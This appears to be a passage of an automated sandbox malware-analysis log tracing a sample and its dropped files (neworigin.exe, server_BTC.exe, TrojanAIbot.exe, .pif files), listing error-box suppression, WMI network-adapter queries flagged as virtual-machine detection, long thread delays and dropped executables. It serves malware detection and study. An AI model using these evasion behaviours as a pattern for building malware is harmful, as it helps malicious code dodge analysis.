Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 15E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 29A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2B60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 29E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 13D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2E50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2790000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 29D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2800000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: E30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2BA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: FA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2AF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2CE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 4CE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2B70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2CF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 4CF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2920000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2660000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 4789	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 1465	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5984
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 5176
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 4614
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 965
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 365
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 4860
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 4961

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	Dropped PE file which has not been started: C:\Users\Public\xpha.pif			Jump to dropped file

Source: C:\Users\Public\Libraries\Wisrysxl.PIF

API coverage: 9.7 %

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6620	Thread sleep count: 4789 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99841s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99682s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99522s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99392s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99248s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99105s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98983s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98743s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98288s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98147s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97920s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97811s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97661s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97403s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97231s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97104s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96987s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96622s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96511s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6620	Thread sleep count: 1465 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96299s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96174s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -95924s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -95799s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99732s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99612s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -99344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98867s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98607s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98340s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98233s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -98072s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97945s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97834s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97708s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97580s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97451s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97291s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -97087s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96940s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 6208	Thread sleep time: -96016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 1576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676	Thread sleep count: 5984 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7224	Thread sleep time: -310560000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7224	Thread sleep time: -276840000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6420	Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7364	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7796	Thread sleep count: 965 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -99861s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -99718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -99592s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7796	Thread sleep count: 365 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -99351s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -99106s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -98670s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -98540s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -98356s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -98203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -98081s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -97957s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -97829s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -97519s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -97350s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -97175s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -96957s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -96795s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7792	Thread sleep time: -96550s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7640	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99792s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99504s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99279s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99167s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -99055s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98943s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072	Thread sleep time: -98828s >= -30000s
